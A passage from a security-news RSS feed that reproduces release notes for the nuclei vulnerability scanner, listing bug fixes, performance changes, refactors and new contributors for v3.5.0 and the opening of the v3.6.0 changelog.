<li>Using clone options for auth store by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3578153699" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6572" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6572/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6572">#6572</a></li>
<li>Path-based fuzzing SQL fix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tarunKoyalwar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tarunKoyalwar">@tarunKoyalwar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3336303385" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6400" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6400/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6400">#6400</a></li>
<li>Fix(fuzz): handles duplicate multipart form field names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3337444362" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6404" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6404/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6404">#6404</a></li>
<li>Don't load templates with the same ID by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3402557917" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6465" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6465/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6465">#6465</a></li>
<li>Remove the stack trace when the nuclei-ignore file does not exist by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nu11zy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nu11zy">@nu11zy</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3381612922" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6455" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6455/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6455">#6455</a></li>
<li>Fix: update go jira deps by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/knakul853/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/knakul853">@knakul853</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3411591634" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6475" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6475/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6475">#6475</a></li>
<li>Jira: hotfix for Cloud to use /rest/api/3/search/jql by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/knakul853/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/knakul853">@knakul853</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3441555219" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6489" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6489/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6489">#6489</a></li>
<li>Fix: improve cleanup in parallel execution by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/knakul853/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/knakul853">@knakul853</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3442751284" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6490" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6490/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6490">#6490</a></li>
<li>Fix headless template loading logic when <code>-dast</code> option is enabled by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3445376046" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6495" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6495/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6495">#6495</a></li>
<li>Fix: suppress warn code flag not found &amp; excludes known misc dir by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3459973508" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6500" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6500/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6500">#6500</a></li>
<li>Fix(variable): global variable not same between two request in flow mode by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iuliu8899/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iuliu8899">@iuliu8899</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3328360561" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6395" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6395/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6395">#6395</a></li>
<li>Log failed expr compilations by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3509712363" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6528" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6528/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6528">#6528</a></li>
<li>Fixing failing integration tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3535934935" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6544" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6544/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6544">#6544</a></li>
<li>Fix: populate req_url_pattern before event creation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ice3man543/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ice3man543">@Ice3man543</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3544813890" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6547" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6547/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6547">#6547</a></li>
<li>Fix(headless): fixed memory leak issue during page initialization by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deamhan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deamhan">@Deamhan</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3576543015" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6569" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6569/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6569">#6569</a></li>
<li>Fix(templates): mem leaks in parser cache by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3582221200" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6584" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6584/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6584">#6584</a></li>
<li>Fix(http): resolve timeout config issues by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3566578610" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6562" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6562/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6562">#6562</a></li>
<li>Fix(charts): fixed out of bounds read by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deamhan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deamhan">@Deamhan</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3618035608" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6607" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6607/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6607">#6607</a></li>
<li>Feat 6231 deadlock by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3407252627" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6469" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6469/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6469">#6469</a></li>
</ul>
<h2>⚡ Performance Improvements</h2>
<ul>
<li>Perf(loader): reuse cached parsed templates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3460928313" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6504" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6504/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6504">#6504</a></li>
<li>Http probing optimizations high ports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/matejsmycka/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/matejsmycka">@matejsmycka</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3516973563" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6538" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6538/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6538">#6538</a></li>
<li>Cache, goroutine and unbounded workers management by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/knakul853/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/knakul853">@knakul853</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3347019669" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6420" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6420/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6420">#6420</a></li>
<li>Centralizing ratelimiter logic by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3410994924" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6472" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6472/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6472">#6472</a></li>
</ul>
<h2>🔧 Refactoring</h2>
<ul>
<li>Refactor to use reflect.TypeFor by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cuiweixie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cuiweixie">@cuiweixie</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3358613762" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6428" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6428/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6428">#6428</a></li>
<li>Refactored header-based auth scans not to normalize the header names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/halcyondream/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/halcyondream">@halcyondream</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3414403653" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6479" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6479/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6479">#6479</a></li>
<li>Refactor(disk): templates catalog by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2742013940" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/5914" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/5914/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/5914">#5914</a></li>
</ul>
<h2>📦 Other Changes</h2>
<ul>
<li>Test(reporting/exporters/mongo): add mongo integration test with test… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loresuso/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loresuso">@loresuso</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3073527486" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6237" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6237/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6237">#6237</a></li>
<li>Bump httpx version by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3354414704" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6425" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6425/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6425">#6425</a></li>
<li>Reporting validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mkrs2404/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mkrs2404">@mkrs2404</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3382559284" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6456" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6456/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6456">#6456</a></li>
<li>Code from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3357318495" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6427" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6427/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6427">#6427</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3409439612" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6471" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6471/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6471">#6471</a></li>
<li>No changes message for github custom template update to INF from ERR for better logging by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zy9ard3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zy9ard3">@zy9ard3</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3349854418" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6422" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6422/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6422">#6422</a></li>
<li>Update Go version requirement in README by @DFwJZ in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3511610416" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6529" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6529/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6529">#6529</a></li>
<li>Chore(typos): fix typos by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pstoeckle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pstoeckle">@pstoeckle</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3503438574" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6521" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6521/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6521">#6521</a></li>
<li>Chore: add typos check into tests CI by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3513299097" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6533" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6533/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6533">#6533</a></li>
<li>Revert "chore: add typos check into tests CI" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3513776909" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6535" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6535/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6535">#6535</a></li>
<li>Chore: preserve issue report w/ issue form by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3513231578" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6531" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6531/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6531">#6531</a></li>
<li>Update go version in logo by @DFwJZ in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3511635575" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6530" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6530/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6530">#6530</a></li>
<li>Update <code>-tl</code> flag by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/matejsmycka/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/matejsmycka">@matejsmycka</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3516793421" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6536" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6536/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6536">#6536</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loresuso/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loresuso">@loresuso</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3073527486" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6237" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6237/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6237">#6237</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cuiweixie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cuiweixie">@cuiweixie</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3358613762" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6428" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6428/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6428">#6428</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mkrs2404/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mkrs2404">@mkrs2404</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3382559284" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6456" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6456/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6456">#6456</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nu11zy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nu11zy">@nu11zy</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3381612922" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6455" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6455/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6455">#6455</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zy9ard3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zy9ard3">@zy9ard3</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3349854418" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6422" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6422/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6422">#6422</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/halcyondream/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/halcyondream">@halcyondream</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3414403653" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6479" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6479/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6479">#6479</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/matejsmycka/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/matejsmycka">@matejsmycka</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3486744926" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6511" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6511/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6511">#6511</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mielverkerken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mielverkerken">@mielverkerken</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3303789757" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6373" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6373/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6373">#6373</a></li>
<li>@DFwJZ made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3511610416" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6529" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6529/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6529">#6529</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pstoeckle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pstoeckle">@pstoeckle</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3503438574" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6521" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6521/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6521">#6521</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deamhan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deamhan">@Deamhan</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3576543015" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6569" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6569/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6569">#6569</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chovanecadam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chovanecadam">@chovanecadam</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3481917109" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6508" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6508/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6508">#6508</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/projectdiscovery/nuclei/compare/v3.4.10...v3.5.0"><tt>v3.4.10...v3.5.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v3.6.0]]></title>
<description><![CDATA[What's Changed
✨ New Features

Write resume file specified by flag by @circleous (#6616)
Javascript Multi-Port Support by @pussycat0x (#6501)
Direct fuzzing using target URL for OpenAPI/Swagger by @roiswd (#6542)
Bump DSL with .NET deserialization helpers by @Ice3man543 (#6625)
Implement persiste...]]></description>
<link>https://tsecurity.de/de/3487862/it-security-tools/v360/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487862/it-security-tools/v360/</guid>
<pubDate>Tue, 05 May 2026 02:20:16 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>What's Changed</h1>
<h2>✨ New Features</h2>
<ul>
<li>Write resume file specified by flag by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/circleous/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/circleous">@circleous</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6616" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6616/hovercard">#6616</a>)</li>
